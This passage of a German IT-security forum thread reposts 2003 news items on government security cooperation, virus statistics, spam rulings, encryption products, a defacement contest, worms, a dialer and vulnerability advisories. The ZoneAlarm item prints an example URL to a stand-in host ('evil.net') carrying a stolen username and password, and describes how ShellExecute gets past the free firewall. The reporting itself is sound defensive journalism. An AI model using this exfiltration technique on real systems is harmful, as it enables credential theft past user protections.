Veröffentlicht: 30.06.2003
Aktualisiert: 30.06.2003
Quelle: Bugtraq
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #112
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Sicherheitskooperation: Infineon und Bundesinnenministerium

IT-Sicherheit für Verwaltung, Unternehmen und Privathaushalte


Das Bundesministerium des Inneren (BMI) und Infineon wollen künftig eng im Bereich der IT-Sicherheit zusammenarbeiten. Bundesinnenminister Otto Schily und Dr. Ulrich Schumacher, Vorstandsvorsitzender von Infineon, unterschrieben jetzt in München das "Memorandum of Understanding" für eine weitreichende Sicherheitskooperation.




Ziel der Sicherheitskooperation zwischen dem BMI und Infineon ist es, die Grundlagen für eine verbesserte Sicherheit von IT-Systemen für die öffentliche Verwaltung, Unternehmen und Privathaushalte zu schaffen. Die Vertragspartner haben hierzu den engen Informationsaustausch zu drei Themenkomplexen vereinbart.

Diese umfassen die Sicherheit im Bereich der Chipkartentechnologie, die Sicherheit zukünftiger mobiler Anwendungen und die Sicherheit elektronischer Komponenten, mit denen die Vertrauenswürdigkeit von PCs und PC-Netzwerken erhöht werden kann. Außerdem beabsichtigen das BMI und Infineon, bei ausgesuchten Themen - wie etwa bei der Bürgerkarte mit digitaler Signatur oder BundOnline 2005 - gemeinsam Projekte zur Förderung des Einsatzes sicherer Informationstechnologien voranzutreiben. Im Mittelpunkt der Chipkartensicherheit stehen technologische Fragestellungen, die beispielsweise die Grundlage für neue elektronische Ausweise und das Gesamtkonzept für eine qualifizierte Signaturkarte bilden. Diese qualifizierte Signaturkarte für jeden Bürger soll die zukünftigen Anwendungen Bürgerkarte, Jobkarte und Gesundheitskarte auf der Basis des deutschen Signaturgesetzes und die Aufnahme biometrischer Funktionalität umfassen.

Beim Thema der sicheren mobilen Lösungen wollen das BMI und Infineon gemeinsam Anwendungsszenarien und eine vertrauenswürdige mobile Plattform erarbeiten, damit beispielsweise Mobiltelefone oder andere mobile Endgeräte wie PDAs zukünftig zum Signieren von Daten oder zum Bezahlen mit größtmöglicher Sicherheit genutzt werden können. "Unsere Informationsgesellschaft wird mobiler und verlangt nach modernsten Sicherheitsvorkehrungen. Zuverlässige Kommunikations- und Informationstechnologien sind erforderlich, die unsere Computersysteme und -netzwerke vor unberechtigter Nutzung und Manipulation schützen", erklärte Bundesinnenminister Otto Schily. "Von der intensiven Zusammenarbeit mit Infineon erwarten wir, unseren Bürgern wesentlich bessere Sicherheitsstandards zügig zur Verfügung zu stellen, gleichzeitig die öffentliche Verwaltung zu modernisieren und immer mehr Dienstleistungen bürgerfreundlicher online anzubieten."

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) ist über das BMI eng in die jetzt vereinbarte Sicherheitskooperation eingebunden.

Golem.de Link

_______


Bugbear-B führt die Viren-Charts an


Um 17,5 Prozent mehr neue Würmer in den letzten sechs Monaten

Nieder-Olm (pte, 1. Jul 2003 14:29) - Die Zahl der neu geschriebenen Viren ist im ersten Halbjahr 2003 im Vergleich zum gleichen Zeitraum des Vorjahres um 17,5 Prozent gestiegen. Das geht aus einem Report des Antiviren-Software-Entwicklers Sophos http://www.sophos.de hervor. Demnach hat Sophos in den ersten sechs Monaten dieses Jahres 3.855 neue Viren aufgespürt und gegen diese Schutzmechanismen entwickelt.

Die Rangliste der Viren führt Bugbear-B an, der 11,6 Prozent der Meldungen an Sophos ausmachte, obwohl er erst seit wenigen Wochen im Umlauf ist. Sein "älterer Bruder" Bugbear-A verursachte weitere 2,5 Prozent der Anfragen. "Bugbear-B ist erst kürzlich auf der Bildfläche erschienen, aber trotzdem hat er mehr Anfragen verursacht, als alle anderen Viren der letzten sechs Monate", erklärt Gernot Hacker, Senior Technical Consultant bei Sophos. "Indem er seinen Inhalt bei jedem automatischen Weiterversand verändert und sogar die E-Mail-Adresse des jeweiligen Absenders ausgetauscht hat, ist Bugbear-B zum häufigsten und irritierendsten Virus dieses Jahres avanciert", so Hacker weiter.

Platz zwei der Charts hat der Wurm Sobig-C erreicht, der 9,7 Prozent der Kundenanfragen ausgemacht hat. Der Wurm, der sich als Support-E-Mail von Bill Gates ausgab, war so programmiert, dass er bereits nach einer Woche nicht mehr funktionstüchtig war. Von den insgesamt fünf Sobig-Würmern in diesem Jahr tauchen zwar lediglich die Varianten A und B in der Rangliste auf, alle Sobig-Würmer zusammen hatten jedoch die größte Auswirkung auf Unternehmensnetze gezeigt.

Der Wurm Klez-H, der bereits im März 2002 das erste Mal registriert war, ist noch immer der am dritthäufigsten gemeldete Wurm in diesem Jahr. Acht der Top-Ten-Viren können sich über mehr als eine Art verbreiten, indem sie eine Kombination aus E-Mail, Internet Relay Chat (IRC), Network-Shares und/oder Peer-to-Peer-File-Sharing-Plattformen ausnutzen. Als Viren-Star des Jahres gilt bis jetzt Avril Lavigne, so die Studie. Die zwei Avril-Würmer machen 5,5 Prozent der Gesamtwertung des Virenreports aus. Nicht in die Charts geschafft hat es der Igloo-Wurm, der behauptete, unauthorisierte Fotos von Catherine Zeta-Jones, Shakira, Sarah Michelle Gellar und Sandra Bullock zu enthalten.

Andere Viren bedienten sich bestimmter Nachrichten und aktuellem Tagesgeschehen, um stärker verbreitet zu werden. Der Coronex-Wurm tarnte sich zum Beispiel als Information über den SARS-Virus und der Ganda-Wurm gab vor, geheime Spionage-Fotos aus dem Irak-Krieg zu enthalten. Eine weitere Gefahr sind Hoaxes, falsche Meldungen über nicht existente Viren. Die Charts der Virenhoaxes führt JDBGMGR an (16,7 Prozent), an zweiter Stelle liegt WTC Survivor (14,0 Prozent), Rang drei belegt Meninas da Playboy (8,2 Prozent). "Hoaxes sind eine echte Plage, denn sie verschwenden Zeit, Geld und Bandbreite und lassen so manchen Mitarbeiter das Gesicht vor den Kollegen verlieren", erklärt Hacker.
(Ende)
PresseTextLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #113
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Subdomain-Vermieter haftet für Spam

Laut einem Urteil des Amtsgerichts Leipzig haftet der Betreiber eines Subdomain-Service für unerwünschte Werbe-E-Mails, in denen für die auf den Subdomains abgelegten Seiten geworben wird. Dies entschied das Gericht mit Urteil vom 27. Februar 2003 (AZ 02 C 8566/02).

Der Kläger, ein Rechtsanwalt, hatte im August 2002 mehrere E-Mails mit pornografischen Inhalten und gefälschten Absenderadressen erhalten. Geworben wurde unter anderem für mehrere Subdomains unterhalb der Hauptdomain des Beklagten. Der Kläger forderte daraufhin den Beklagten außergerichtlich auf, zukünftig dafür zu sorgen, dass er von derartigen Sendungen verschont bleibt. Dieser verweigerte jedoch die Abgabe einer Unterlassungserklärung.

Das Amtsgericht Leipzig gab dem Kläger in seiner Entscheidung Recht und verurteilte den Beklagten dazu, es zu unterlassen, an den Kläger E-Mails zu senden oder senden zu lassen, die für die Domain des Beklagten werben. Das Versenden derartiger Werbung stelle einen Eingriff in das allgemeine Persönlichkeitsrecht sowie das Recht am eingerichteten und ausgeübten Gewerbebetrieb da.

Hierfür sei der Betreiber des Subdomain-Dienstes auch als so genannter "Zustandsstörer" mitverantwortlich. Dies gelte zumindest dann, wenn der Absender der Werbe-E-Mails gefälscht sei und nicht ausfindig gemacht werden kann, sodass der Betreiber des Service einzige Bezugsperson sei. Diesen treffe als Vermieter der Domains eine Kontrollpflicht, was die Subdomains und die darüber verschickten E-Mails anbelange, da er durch seinen Service die Ursache für die unverlangte E-Mail-Werbung geliefert habe. Weiter sei er auch für eine ordentliche Registrierung der Subdomains verantwortlich und müsse überprüfen, ob die von den Kunden angegebenen Adressen auch tatsächlich existieren, so das Gericht. Hinzu komme, dass auch für die Hauptdomain des Beklagten in den Spam-Mails geworben wurde.

Rechtsanwalt Ingo Friedrich, Kläger im Verfahren, begrüßte das Urteil. "Es kann nicht angehen, dass sich Betreiber von derartigen Angeboten trotz Kenntnis des Missbrauchs einfach aus der Haftung stehlen." Gegen das Urteil wurde Berufung eingelegt, sodass sich nun das Landgericht Leipzig noch einmal mit dem Fall beschäftigen wird. (Joerg Heidrich) / (hob/c't)




_______


Spammer bekennt sich schuldig


MÜNCHEN (COMPUTERWOCHE) - In Kentucky hat sich ein Mann vor Gericht für schuldig erklärt, neun Millionen E-Mails versendet zu haben. In den Nachrichten versuchte er die Emfänger dazu zu bringen, in angeblich hoch profitable Anlagen zu investieren. Er soll 26 Interessenten gefunden haben, die rund 80 000 Dollar überwiesen. Jetzt drohen ihm Strafen von bis zu 20 Jahren Gefängnis und eine hohe Geldstrafe. Das Urteil soll Anfang Oktober gesprochen werden. (ho)


ComputerWocheLink


_______



RSA Security stellt neues Verschlüsselungsverfahren vor

Neue Nightingale-Technologie basiert auf der Methode des "Secret-Splitting"


RSA Security hat ein neues Verschlüsselungsverfahren vorgestellt. Die neu entwickelte Lösung Nightingale (dt.: Nachtigall), die in den RSA Laboratories entwickelt wurde, basiert auf der Technologie des "Secret-Splitting" und soll alle Arten von sensiblen Informationen sowohl vor internen als auch vor externen Bedrohungen schützen. Unter die Daten mit besonders hoch einzustufenden Schutzanforderungen fallen beispielsweise Patienten- oder Finanzdaten, Kreditkarteninformationen, kryptografische Schlüssel oder andere wichtige Daten.

Nightingale verteilt unternehmenskritische Daten und sensible Informationen mit Hilfe von Verschlüsselungstechniken auf zwei unterschiedliche Server - dem Nightingale-Server und einem beliebigen Applikations-Server. Das kryptografische Verfahren ist als "Secret-Splitting" bekannt. Es soll sicherstellen, dass ein Angreifer die Informationen nicht entschlüsseln kann, wenn er sich Zugang zu einem Server verschafft.

Das Verfahren basiert auf der RSA-BSAFE-Verschlüsselungssoftware. Die Daten liegen nur temporär zusammenhängend vor und werden nur dann in Klartext - zum Beispiel auf einem Client - zusammengeführt, wenn sich dessen Nutzer zuvor entsprechend authentifiziert hat. Ansonsten bleiben die Informationen gesplittet. Die Verteilung auf unterschiedliche Server eliminiert die Anfälligkeit durch einen Angriff an einem Punkt. Im Prinzip fungiert die Nightingale-Technologie als Backend-Privacy-Server, der den Applikationsserver vor Angriffen abschirmt.

Die Nightingale-Technologie soll ab dem dritten Quartal 2003 als Software Development Kit verfügbar sein. Darüber hinaus soll sie in künftigen Identity- und Access-Management-Lösungen von RSA Security integriert werden.

GolemLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #114
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Aktuelle Sicherheitslücken

Code ausführbar in OpenSSH



Software: OpenSSH 1.2.2 bis 3.3
Typ: Fehlerhafte Ausnahmebehandlung


Problem: Der OpenSSH SSH2 challenge-response Mechanismus kann fehlerhaft gesendete Antworten nicht ordnungsgemäss behandeln.
Effekt: Durch eine absichtlich fehlerhafte Antwort können Angreifer auch ohne gültigen Account Shellkommandos auf dem Zielsystem ausführen.
Lokal: nein
Remote: ja


Exploit: Beschreibung
Exploit
Lösung: Es wird empfohlen auf OpenSSH 3.4 upzudaten und privilege separation zu aktivieren.


Veröffentlicht: 01.07.2003
Aktualisiert: 01.07.2003
Quelle: Bugtraq
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #115
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Cracker zu vier Jahren Gefängnis verurteilt

Der Kasache Oleg Zezev ist wegen Einbruch in das Computersystem des Finanzinformationsdienstes Bloomberg und Erpressung von einem US-Gericht zu 51 Monaten Gefängnis verurteilt worden. Nach US-Medienberichten muss Zezev außerdem eine Million US-Dollar Schadensersatz zahlen.

Zezev hatte als Cheftechniker bei dem kasachischen Unternehmen Kaskommerts Securities gearbeitet und dabei Zugang zu Bloomberg-Diensten über das Internet bekommen. Dabei gelang es ihm offensichtlich, Sicherheitslücken im System zu entdecken und mehrfach in verschiedene Accounts einzudringen -- unter anderem auch von Firmengründer Michael Bloomberg, der mittlerweile Bürgermeister von New York ist. Mit den bei diesen Aktionen erbeuteten Informationen versuchte Zezev Bloomberg um 200.000 US-Dollar zu erpressen, wurde jedoch bei einem Treffen mit Michael Bloomberg in London verhaftet und im Mai 2002 in die USA überstellt. (wst/c't)


HeiseLink

_____


Wettbewerb für Angriffe auf Webserver


Für den 6. Juli soll ein Website-Defacement-Wettbewerb geplant sein, bei dem möglichst viele Webseiten in kurzer Zeit gehackt werden sollen. Gewinner wird, wer als erster 6000 Webseiten manipuliert hat. Der Wettbewerb wurde bis gestern auf www.defacers-challenge.com angekündigt, mittlerweile ist die Seite aber vom Netz genommen worden.

Als Website-Defacements werden Manipulationen der Startseite eines Webservers bezeichnet, zum Beispiel das Einfügen eines Logo einer Hackergruppe. Dazu ist aber nicht immer die vollständige Kontrolle, also Root-Zugriff, auf die Maschine des Servers notwendig. Spezielle Defacement-Tools schaffen es innerhalb weniger Minuten, hunderte von Webseiten zu manipulieren, wenn ein einzelner Server mehrere Webseiten hostet.

Nach Angaben der Spezialisten des X-force Sicherheitsteam des Herstellers Internet Security Systems (ISS) sind offenbar erste Vorbereitungen schon im Gange, potenziell verwundbare Server zu identifizieren. Sie hätten eine Abnahme der Angriffe auf Webseiten festegestellt, dafür sei die Zahl der Schwachstellenscans in die Höhe gegangen, die ein Anzeichen für einen bevorstehenden Angriff sind. Dies bestätigen auch Roberto Pretoni, Gründer und Betreiber des Zone-H-Archives für sogenannte Website-Defacements und ein mit dem Department of Homeland Security kooperierendes Überwachungsnetzwerk. Allerdings weist das US-Ministerium für Innere Sicherheit darauf hin, das solche Challenges regelmäßig stattfinden würden. Daher würde auch der Threat Level nicht erhöht werden.

Mittlerweile gibt es auch Stimmen, die den Wettbewerb als Fake einstufen. Rafael Nunez, ehemaliger Hacker, geht davon aus, dass brasilianische Script-Kiddies den Wettbewerb ins Leben gerufen haben. Darauf würden auch die in portugiesisch verfasste Ausschreibung hinweisen. Nunez kritisiert die Firma ISS, die mit der Entdeckung der Seite und der anschliessenden Meldung an die Presse den Stein ins Rollen brachte. "ISS warnt vor 8-jährigen Terroristen und macht die Sache bedrohlicher als sie ist", sage Nunez gegenüber US-Medien. Auch Symantec hat mit seiner Überwachung bisher keine Anomalien festgestellt. (dab/c't)


HeiseLink

____


Australien ruft Hightech-Polizei ins Leben


Behörde soll Computerstraftaten verfolgen

Canberra (pte, 2. Jul 2003 17:05) - In Canberra ist heute, Mittwoch, eine eigene Behörde zur Bekämpfung von Hightech-Kriminalität ins Leben gerufen worden. Das Australian High Tech Crime Centre (AHTCC) http://www.ahtcc.gov.au/ soll künftig alle Computer-Straftaten wie das Eindringen in fremde Netzwerke oder auch "traditionelle" Straftaten, die mit den neuen Technologien unterstützt werden, bekämpfen. So soll die Behörde etwa auch den Drogen-Handel via Internet ins Visier nehmen.

Das AHTCC sollen einen koordinierten Ansatz darstellen, um Hightech-Kriminalität ernsthaft, umfassend und auf mehreren rechtlichen Ebenen zu bekämpfen, berichtet AustralianIT. "Hightech-Crime ist nicht länger eine Fiktion aus James-Bond-Filmen, sondern ist Realität und existiert in allen Gesellschaften", sagte Mal Hyde, der künftige Vorsitzende des Zentrums. Das AHTCC werde "unsere Fähigkeiten signifikant verbessern, Trends in der IT-Kriminalität zu erkennen und entsprechend zu reagieren", erklärte Hyde. In der neuen Behörde werden Kräfte aus den einzelnen Bundesstaaten und der australischen Bundespolizei zusammengezogen. (Ende)


PresseTextLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #116
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
0190-Dialer mit Selbstzerstörung

Network Associates warnt vor einen neuartigen Dialer. Der Schädling versucht, nach dem Start selbstständig eine 0190-Nummer anzuwählen. Nach erfolgreicher Einwahl löscht sich das Programm von der Festplatte -- damit haben die Opfer auch keine Möglichkeit nachzuweisen, dass der Dialer gegen den Willen des Anwenders die Verbindung hergestellt hat. Änderungen an der Registry oder anderen System-Dateien nimmt das Programm nicht vor.

Der Dialer kursiert bislang unter dem Namen 1840.exe; jedoch ist der Dateiname kein eindeutiges Merkmal, um die Datei zu erkennen, da dieser relativ leicht geändert werden kann. Über die Verbreitungswege das Programms ist bislang nichts bekannt: Es könnte per E-Mail, oder aber auch per P2P-Tauschbörsen in Umlauf gekommen sein. Nichtsdestotrotz stuft Network Associates die Verbreitung und Gefährlichkeit momentan als gering ein. Bis Mittwoch will das Unternehmen Updates seiner Antivirensoftware bereitstellen, die den Dialer erkennen und eliminieren. (jo/c't)


HeiseLink

____


Voltage entwickelt neues Verschlüsselungsverfahren


MÜNCHEN (COMPUTERWOCHE) - Das im Silicon Valley angesiedelte Startup-Unternehmen Voltage Security hat eine neue Lösung angekündigt, um E-Mails und Dokumente zu verschlüsseln. Sie basiert auf einem System, das die Informatiker Dan Boneh von der Stanford University und Matt Franklin von der University of California in Davis entwickelt haben.

Bei der identitätsgebundenen Verschlüsselung handelt es sich um eine Weiterentwicklung des PKI-Systems (Public Key Infrastructure), das die Handhabung der Schlüssel vereinfachen soll. Über einen zentral verwalteten Generalschlüssel werden private Schlüssel (Private Key) für Anwender erstellt. Deren E-Mail-Adressen dienen als öffentliche Schlüssel (Public Key). Auf diese Weise soll es möglich sein, jederzeit verschlüsselte Mails zu verschicken.

Während die E-Mail-Adresse bekannt ist, müssen sich Nutzer bislang verfügbarer Systeme, die auf privaten und öffentlichen Schlüsseln basieren wie PGP (Pretty Good Privacy), erst die Public Keys der Anwender beschaffen, an die sie verschlüsselte Nachrichten senden wollen.

Wer eine verschlüsselte Nachricht erhält, jedoch noch keinen Private Key hat, kann laut Voltage Security auf einen in der Mail enthaltenen Link klicken, der auf den zentralen Kryptographie-Server leitet. Dort muss er sich authentifizieren, um den privaten Schlüssel zu bekommen, über den kodierte E-Mails lesbar werden. Die zugehörige Client-Software soll sich darauf hin automatisch installieren.

Laut Hersteller lässt sich das System in verschiedene E-Mail-Clients einbinden. Demnach erscheint zum Beispiel in Microsofts Programm Outlook ein zusätzlicher Button "Send Secure", der zum Versenden verschlüsselter Nachrichten dient. Außerdem sollen sich auch Instant Messages absichern lassen. Ab wann die Software verfügbar ist, ist ebenso wenig bekannt wie der Preis. (lex)


ComputerWocheLink

_______


CDU/CSU: Spam muss verboten werden


Bundestagsfraktion von CDU/CSU fordert gesetzliche Regelungen gegen Spam


Als Reaktion auf zunehmende Verbreitung von unerwünschten Werbe-E-Mails (Spam) fordern Dr. Martina Krogmann, Internetbeauftragte der CDU/CSU- Bundestagsfraktion, und Eckart von Klaeden, Parlamentarischer Geschäftsführer der CDU/CSU-Bundestagsfraktion, jetzt eine ausdrückliche gesetzliche Regelung zum Verbot von Spam. Die beiden Oppositionspolitker kritisieren dabei die rot-grüne Bundesregierung, die die EU-Richtlinie zum Datenschutz in der Telekommunikation bislang nicht umgesetzt habe. Die Richtlinie sieht vor, dass E-Mail-Werbung von Unternehmen grundsätzlich nur mit vorheriger Zustimmung des Empfängers an diesen versandt werden darf.




Betroffen von der zunehmenden Zahl der Spam-E-Mail seien Wirtschaft, Verwaltung, Privatpersonen und der Deutsche Bundestag gleichermaßen. Die Zuleitung unverlangter Werbung sei nicht nur eine erhebliche Belästigung für den Verbraucher, sondern führt auch in den Unternehmen zu großen Schäden, da die Beseitigung der unerwünschten elektronischen Post inzwischen einen hohen Arbeitsaufwand erfordert. Spam belaste außerdem die Internet Service Provider, Netzinfrastrukturbetreiber und Mailanbieter mit horrenden Kosten, so Krogmann und von Klaeden.

Zwar sei der Bundestag dabei, entsprechende technische Vorkehrungen zur Bekämpfung von Spam zu treffen, unter dem Strich blieben diese Maßnahmen aber unbefriedigend, zumal nach wie vor die dann als Spam gekennzeichneten Mails individuell auf tatsächlich unerwünschte Inhalte geprüft werden müssten.

Auf den Missbrauch des Internets durch Spam müsse der Gesetzgeber daher reagieren. "Es ist dringend notwendig, dass auch in Deutschland der Versand von Spam-Mails ausdrücklich verboten und strafbewehrt wird." Bislang sei in Deutschland die Zusendung unerbetener Werbe-Mails lediglich durch die Rechtsprechung zum unlauteren Wettbewerb erfasst. Eine ausdrückliche gesetzliche Regelung gebe es bisher nicht. Damit sei Spam in Deutschland nicht unmittelbar verboten.

"Es bedarf daher einer politischen Initiative, die für gesetzliche Klarheit und Verlässlichkeit sorgt. Deswegen wird die CDU/CSU-Bundestagsfraktion in Kürze einen Anti-SPAM-Roundtable mit Vertretern aus Wirtschaft, Politik und Verbraucherschutz einrichten und einen Antrag auf den Weg bringen", so die Politiker der CDU/CSU-Bundestagsfraktion. Dabei will man nicht nur auf eine Verschärfung des rechtlichen Rahmens, d.h. eine unverzügliche und effektive, strafbewehrte Ahndung von unerwünschten Spam-E-Mails drängen, sondern auch eine gesetzliche Regelung einfordern, durch die die Identifizierung des Spammers möglich wird. Darüber hinaus sollen datenschutzrechtliche Regelungen den Adresshandel durch spürbare Sanktionen eindämmen und eine zentrale Melde-/Beschwerdestelle eingerichtet werden, bei der Spam-Meldungen erfasst und weiter verfolgt werden sollen. Aber auch der Verbraucher soll über den Umgang mit seiner E-Mail-Adresse und über den Umgang mit unverlangter E-Mail-Werbung aufgeklärt werden.

Dabei räumt die CDU/CSU-Bundestagsfraktion ein, dass nationale rechtliche Maßnahmen alleine nicht ausreichend sein werden, um Spam einzudämmen, da die Verursacher häufig aus dem außereuropäischen Ausland vorgehen. "Eine weltweite internationale Zusammenarbeit sowie eine Allianz von Wirtschaft, Verbrauchern und Politik gegen Spam ist unbedingt notwenig - so schnell wie möglich!"

GolemLink


_______


Beschränkte Schäden durch Hacker-Contest


Hunderte Websites sind betroffen

Canberra/Washington (pte, 7. Jul 2003 14:55) - Der für vergangenen Sonntag vom US-Department für nationale Sicherheit http://www.dhs.gov/dhspublic/ angekündigte Hacker-Contest ist nach derzeitigem Wissensstand ohne bedeutende Attacken verlaufen. Betroffen sind vor allem eine Reihe von kleineren Websites, während größere Internetseiten keinen Schaden erlitten haben. Experten warnen jedoch vor eventuell später auftretenden Schäden.

Ausschlaggebend für die vergleichsweise geringen Folgen der Hacker-Attacke dürfte die begrenzte Anstrengung der beteiligten Gruppen zur Koordination gewesen sein. Ziel des Angriffes waren unter anderem eine unabhängige Sicherheits-Website, die es sich zur Aufgabe gemacht hat, Berichte über Online-Vandalismus nachzuprüfen, sowie hunderte kleinere Websites.

Der Schaden hielt sich demnach in Grenzen. So bezeichnete der Besitzer von Montana Realty, Don Asper, als ein Betroffener die Attacke durch unbekannte Personen für lediglich störend. Ebenso sieht Peter Allor von der Firma Internet Security Systems die ganze Sache gelassen: "Letztendlich wussten wir ja, was auf uns zukam" und betont weiters, dass dadurch Maßnahmen zum Schutz der Systeme gesetzt worden konnten. Die Nicht-Beschädigung von wichtigen Internetseiten, dürfte ein positives Zeichen für die Online-Sicherheitssysteme von größeren Unternehmen, staatlichen Behörden und Organisationen sein.

Letzte Woche kam es im Vorfeld, nachdem das US-Department vor dem Hacker-Contest gewarnt hatte, zu unterschiedlichen Bewertungen der Gefahr einer möglichen Hacker-Attacke, wie pte berichtete http://www.pte.at/notifyAFriend.mc?pte=030704024 . Während amerikanische wie auch australische Behörden die Warnung herunterspielten, riefen Internetfirmen zu einem ausreichenden Schutz der Systeme auf. Befürchtungen, wie die mögliche Verunstaltung von bis zu 6.000 Webseiten, sind jedoch nicht eingetroffen. Einige Experten sind jedoch der Ansicht, dass man noch abwarten müsse, da bis Ende der Woche noch weitere Schäden bekannt werden könnten. (Ende)

PresseTextLink


________


ZoneAlarm mit Zweiklassensicherheit



Der Hersteller der Personal Firewall ZoneAlarm räumt die Existenz eines "theoretischen Sicherheitsproblems" in der kostenlosen Version seines Produkts ein. Zone Labs sieht aber keine Veranlassung, dieses zu beseitigen: Schließlich sei es in den kostenpflichtigen Versionen bereits behoben. Anzeige


Ein Posting auf der Mailing-Liste BugTraq beschreibt einen einfachen Weg, ZoneAlarm auszutricksen. Um an den Sperren der Personal Firewall vorbei Daten ins Internet zu übermitteln, kann ein Programm die Funktion ShellExecute() der Windows-Bibliothek shell32.dll mit einer URL aufrufen. Dann startet das System den Standard-Browser mit dieser URL. Der Browser darf normalerweise über Port 80 ins Internet und kann somit über eine URL wie etwa


http://evil.net/collect.cgi?stolen_username&pw=stolen_password


Daten vom lokalen Rechner an einen beliebigen Server senden.

In einer Antwort auf das Posting räumt Te Smith vom Hersteller Zone Labs die Existenz des Problems zwar ein. Als Abhilfe empfiehlt er jedoch lediglich den Umstieg auf die kostenpflichtigen Versionen ZoneAlarm Pro/Plus, die seit November 2002 beziehungsweise Februar 2003 solche ShellExecute-Aufrufe abfangen können. Eine Notwendigkeit, diese Funktion auch in die kostenlose Version einzubauen, sieht er nicht: "Wir haben die Sicherheit unseres kostenlosen ZoneAlarm kontinuierlich erhöht, [...], aber wir bauen nicht alle erweiterte Funktionen in dieses Basisprodukt ein", schließt er sein Posting.

Nun ist gerade die Kontrolle darüber, welche Programme mit dem Internet kommunizieren dürfen, eine der sinnvollen Anwendungen für eine Personal Firewall. Wenn Zone Labs also bewusst darauf verzichtet, die kostenlose Version gegen solch einfache Umgehungsversuche zu schützen, könnten sich viele Anwender deren Installation auch gleich sparen. Schließlich enthält Windows XP bereits die eingebaute Internetverbindungs-Firewall, mit der man Verbindungen von außen abblocken kann. (ju/c't)


HeiseLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #117
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Aktuelle Sicherheitslücken:

Code Ausfürhbar in Windows 2000



Betriebsystem: Microsoft Windows 2000 / 2000 (Advanced) Server / Datacenter Server
Typ: Pufferüberlauf


Problem: In der Windows 2000 ShellExecute() API kann durch einen besonders langen dritten Parameter ein Pufferüberlauf verursacht werden.
Effekt: Ein Denial of Service oder Ausführen von beliebigem Code kann die Folge sein.
Lokal: ja
Remote: nein


Exploit: Derzeit sind uns keine Exploits bekannt.
Lösung: Microsoft Service Pack 4


Veröffentlicht: 07.07.2003
Aktualisiert: 07.07.2003
Quelle: Bugtraq
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #118
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Julia Roberts macht das Web unsicher - als Wurm

MÜNCHEN (COMPUTERWOCHE) - Jennifer Lopez, Britney Spears, Shakira und Avril Lavigne haben eines gemeinsam: Die Damen sind nicht nur prominente Pop-Diven, ihre Namen werden auch von Virenautoren missbraucht. Der bereits seit März 2002 bekannte "W32.Mylife" setzt nun in der Variante "M", beziehungsweise "N" (Symantec), auf die Schauspielerin Julia Roberts, um ahnungslose Opfer zum Klick auf die integrierte Schadroutine zu verführen. Denn angeblich führen entsprechend manipulierte E-Mails einen Bildschirmschoner im Attachment mit, der die Oscar-Preisträgerin in kompromittierenden Posen auf der Damentoilette zeigen soll.

Wer den Screensaver jedoch installiert, bekommt nicht heiße Fotos zu sehen, sondern riskiert den Verlust seiner Daten, sagen die Antivirenexperten von Sophos. Demnach versucht der Wurm zwischen der 50sten und 59sten Minute jeder Stunde, alle Dateien zu löschen, die auf der lokalen Festplatte gespeichert sind. Außerdem verschickt er sich an alle im Windows-Adressbuch gespeicherten E-Mail-Adressen.

Hat sich der Schädling bereits eingenistet, finden sich die null Byte große Datei "MyLife.mpg" im Wurzelverzeichnis (c:\) und die Datei "Julia_Roberts_*******_toilet.Mpeg_.scr" im Systemverzeichnis. Außerdem trägt sich Mylife in der Registrierdatenbank unter

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"

ein. Das hat zur Folge, dass die Schadroutine beim Start des Rechners automatisch aktiviert wird.

Infizierte E-Mails sind an der Betreffzeile "Fw: Julia Roberts" und dem Nachrichtentext

"Hi
How are you?
Lexy and Mystique, a couple of 18 yr old...
[etc.]
========No virus detected========
MCAFEE.COM

zu erkennen. Der Dateianhang trägt die Bezeichnung "Julia_Roberts_<offensive language removed>_toilet.Mpeg_.scr".

Wahlweise verspricht Mylife.M auch pornographische Darstellungen, in denen angeblich der unbekleidete verlängerte Rücken der Sängerin Shakira die Hauptrolle spielt. In diesem Fall lautet die Betreffzeile verseuchter Mails "Old Shakira" und der Text der Nachricht

"Hi

i saw this good ASS,, i sleep 3 hours ;-)
check Shakira ass soory Shakira movi :)"


Das Attachment enthält die Datei "Shakira_1997_part_1_.Mpeg_.scr". In beiden Fällen sind nur Windows-Systeme ab Version 95 betroffen. (lex)


ComputerWocheLink


_______



Datenschutz-Schild für Websites: WEBpplicance auf deutsch


Durch Controlpanel von Ensim entsprechen Hostinganbieter europäischen Datenschutzgesetzen

Sunnyvale, Kalifornien (pts, 8. Jul 2003 10:30) - Ensim Corporation, Weltmarkführer bei Hosting-Automatisierungssoftware, bringt die deutsche Version von Ensim WEBppliance' Basic und Pro für Linux auf den Markt. Ensim WEBppliance Pro ermöglicht es Webhosting Anbietern als erstes Website-Controlpanel, den strengen europäischen Datenschutzgesetzen zu entsprechen. Europäische Provider können damit neue Standards in der Abwehr von Hackerangriffen auf Webpage-Inhalte setzen.

Hochsicherheits-Level für Homepage-Daten

